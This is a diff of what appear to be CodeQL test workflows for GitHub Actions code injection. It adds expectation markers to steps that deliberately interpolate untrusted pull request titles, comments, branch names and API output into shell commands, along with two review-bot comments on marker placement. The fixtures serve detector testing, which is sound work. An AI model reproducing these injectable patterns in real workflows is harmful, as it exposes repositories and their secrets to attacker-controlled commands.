@@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; + const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical] let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; + const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical] const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml index a237856b6ce7..3ef3f09bf563 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -8,4 +8,4 @@ jobs: permissions: {} uses: ./.github/workflows/reusable-workflow-1.yml with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml index 0f87d1e9394f..e4c6ec031442 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml 
@@ -7,4 +7,4 @@ jobs: test: uses: ./.github/workflows/reusable-workflow-2.yml with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml index 39dfafcf023e..4ef27dca557e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -7,4 +7,4 @@ jobs: test: uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main with: - taint: ${{ github.event.pull_request.title }} + taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml index 5390612f105d..087b116464e5 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -13,8 +13,8 @@ jobs: - id: source uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['comment']['body'] }} + source: ${{ github.event['comment']['body'] }} # $ Source[actions/code-injection/critical] find: 'foo' replace: '' - - run: ${{ steps.source.outputs.value }} - - run: ${{ needs.test1.outputs.job_output }} + - run: ${{ steps.source.outputs.value }} # $ Alert[actions/code-injection/critical] + - run: ${{ needs.test1.outputs.job_output }} # $ Alert[actions/code-injection/critical] 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml index 94e8be89bdc6..78f5c845d04d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml @@ -8,12 +8,12 @@ jobs: - id: summary uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event.head_commit.message }} + source: ${{ github.event.head_commit.message }} # $ Source[actions/code-injection/medium] find: 'foo' replace: '' - id: flow run: | - echo "${{steps.summary.outputs.value}}" + echo "${{steps.summary.outputs.value}}" # $ Alert[actions/code-injection/medium] - id: no-flow run: | echo "${{steps.summary.outputs.foo}}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml index 8271f93d857f..d1c7dedaa10e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml @@ -15,7 +15,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/critical] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -26,7 +26,7 @@ jobs: - name: List all changed files id: sink run: | - for file in ${{ steps.step.outputs.value }}; do + for file in ${{ steps.step.outputs.value }}; do # $ Alert[actions/code-injection/critical] echo "$file was changed" done diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml index 3128aacc93ce..e08ab1a84556 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml 
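Review bot: In simple2.yml the `# $ Source[actions/code-injection/critical]` marker is attached to the `- name: Remove foo from changed files` line, yet the step directly above it carries `id: source` and `uses: tj-actions/changed-files@v40`, which is where a reader would expect the untrusted file names to enter. The `with:` inputs of the annotated step lie outside the hunk, so the reason cannot be confirmed from here; presumably the source is reported at the step that first consumes the changed-files output. If so, a comment above the step, e.g. `# source is reported at this step, which reads the changed-files output`, would make the expectation self-explanatory for anyone triaging a later change in the reported location.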
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -17,7 +17,7 @@ jobs: steps: - name: Echo trigger run: | - echo "head branch: ${{ github.event.workflow_run.head_branch }}" + echo "head branch: ${{ github.event.workflow_run.head_branch }}" # $ Alert[actions/code-injection/critical] cat << EOF - ${{ toJSON(github.event) }} + ${{ toJSON(github.event) }} # $ Alert[actions/code-injection/critical] EOF diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml index 5422ac4e9876..1eb2797e31bc 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -17,5 +17,5 @@ jobs: repo-token: ${{ env.GH_TOKEN }} permission-level: read - - run: echo "${{ steps.command.outputs.command-arguments }}" + - run: echo "${{ steps.command.outputs.command-arguments }}" # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 5aeb9aac7c52..6d29df909559 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -17,7 +17,7 @@ jobs: - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['pull_request']['body'] }} + source: ${{ github.event['pull_request']['body'] }} # $ Source[actions/code-injection/critical] find: 'foo' replace: '' - id: step1 @@ -49,4 +49,4 @@ jobs: needs: job1 steps: - - run: echo ${{needs.job1.outputs['job_output']}} + - run: echo ${{needs.job1.outputs['job_output']}} # $ Alert[actions/code-injection/critical] 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml index d149df2bd7ca..b58a9cb0aa26 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -20,10 +20,10 @@ jobs: - name: Extract Jira Key env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV - name: Sink - run: echo ${{ env.ISSUE_KEY }} + run: echo ${{ env.ISSUE_KEY }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml index 2e734076cb71..9cbfa20a6a27 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml @@ -54,7 +54,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -144,7 +144,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH 
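Review bot: In test10.yml `${{ github.event.workflow_run.head_branch }}` is expected as `Alert[actions/code-injection/medium]`, while the same expression in simple3.yml is expected as `critical`, and nothing near the marker says why. The difference presumably comes from each workflow's `on:` trigger, which is outside the hunk. A short comment above the `run:` block, e.g. `# medium, not critical: determined by this workflow's on: trigger`, would help when a severity expectation changes later; it applies equally to the other five hunks of this file (`-144`, `-237`, `-330`, `-420`, `-515`). The unmarked `${{ github.event.ref }}` and `${{ github.event.workflow_run.head_sha }}` lines in the same script are implicit no-alert expectations and could be labelled as such.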
@@ -237,7 +237,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -330,7 +330,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -420,7 +420,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -515,7 +515,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml index dc101c769449..151ae685df87 100644 
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml @@ -27,7 +27,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number + - name: Try to read PR number # $ Source[actions/code-injection/critical] id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) @@ -51,6 +51,6 @@ jobs: actions: read statuses: write steps: - - run: echo ${{ needs.get-artifacts.outputs.pr_num }} - - run: echo ${{ needs.get-artifacts.outputs.ref }} + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ needs.get-artifacts.outputs.ref }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml index f81bef89568f..e141ea55a115 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -7,7 +7,7 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.title || "foo" }}" + - run: echo "${{ github.event.pull_request.title || "foo" }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml index 1e5c7eec177d..876141d0e17c 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml 
@@ -7,8 +7,8 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.changes.body.from }}" - - run: echo "${{ github.event.changes.title.from }}" - - run: echo "${{ github.event.changes.head.ref.from }}" - - run: echo "${{ toJson(github.event.changes) }}" + - run: echo "${{ github.event.changes.body.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.changes.title.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.changes.head.ref.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ toJson(github.event.changes) }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml index 6d925a82d372..df3dd6e8a11a 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml @@ -12,8 +12,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.changed-files.outputs.files }}" + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] test2: runs-on: ubuntu-latest steps: 
@@ -23,8 +23,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "files=${FILES}" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.changed-files.outputs.files }}" + echo "files=${FILES}" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] test3: runs-on: ubuntu-latest steps: @@ -33,8 +33,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" - - run: echo "${{ env.CHANGED-FILES }}" + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] test4: runs-on: ubuntu-latest steps: @@ -44,8 +44,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" - - run: echo "${{ env.CHANGED-FILES }}" + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml index a39967760e8e..bc06e8a525d8 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml 
@@ -9,30 +9,30 @@ jobs: steps: - id: title run: | - echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title }}" + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] test2: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title }}" + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] test3: runs-on: ubuntu-latest steps: - id: title run: | - echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" - - run: echo "${{ env.TITLE }}" + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] test4: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" - - run: echo "${{ env.TITLE }}" + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml index 0b3002506a14..bf5346b330d5 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml 
@@ -30,7 +30,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-id - - name: get PR id + - name: get PR id # $ Source[actions/code-injection/critical] id: pr run: echo "value=$(> $GITHUB_OUTPUT @@ -42,7 +42,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-ref - - name: get PR ref + - name: get PR ref # $ Source[actions/code-injection/critical] id: ref run: echo "value=$(> $GITHUB_OUTPUT @@ -122,7 +122,7 @@ jobs: - name: Get commit message id: commit-message - run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] # ================= Deploy Demo ================= - name: 📦 Build demo @@ -227,5 +227,5 @@ jobs: "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" } - } + } # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml index 559c69c4710f..712c6fb8100f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml @@ -19,10 +19,10 @@ jobs: route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Set PR source branch as env variable + - name: Set PR source branch as env variable # $ Source[actions/code-injection/critical] if: github.event_name == 'issue_comment' run: | - PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') # $ Alert[actions/code-injection/critical] echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV setup2: runs-on: ubuntu-latest 
@@ -36,13 +36,13 @@ jobs: pull_number: ${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} - - name: Set environment variables + - name: Set environment variables # $ Source[actions/code-injection/critical] run: | MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." >> $GITHUB_ENV; fi echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV - echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] setup3: runs-on: ubuntu-latest steps: @@ -52,8 +52,8 @@ jobs: route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} - - run: | - echo '${{ steps.issues.outputs.data }}' > issues.json + - run: | # $ Source[actions/code-injection/critical] + echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] setup4: runs-on: ubuntu-latest steps: @@ -65,10 +65,10 @@ jobs: repo: bar pull_number: ${{ github.event.issue.number }} - - run: >- + - run: >- # $ Source[actions/code-injection/critical] echo "Pull request title is \"${{ fromJson(steps.get-pull-request.outputs.data).title }}\" but expected - \"Updated test pull request\"" && exit 1 + \"Updated test pull request\"" && exit 1 # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml index 552ad866b5ae..ba51066def8b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -13,9 +13,9 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} - - name: Write issues to file + - name: Write issues to file # $ Source[actions/code-injection/critical] run: | - echo '${{ steps.issues.outputs.data }}' > issues.json + echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] - name: Setup Node.js uses: actions/setup-node@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml index 2773c1044db1..9ee26e0d6265 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml 
@@ -10,102 +10,102 @@ jobs: - id: head_ref run: | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.head_ref.outputs.head_ref}}" + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] - id: title run: | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh pr view $PR_NUMBER --json body --jq .body) - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] - id: files run: | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.files.outputs.files}}" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] - id: 
author run: | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.author.outputs.author}}" + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] pulls2: runs-on: ubuntu-latest steps: - id: head_ref run: | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.head_ref.outputs.head_ref}}" + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] - id: title run: | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] - id: files run: | CHANGED_FILES=$(gh api 
/repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.files.outputs.files}}" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] - id: author run: | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.author.outputs.author}}" + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] issues1: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # 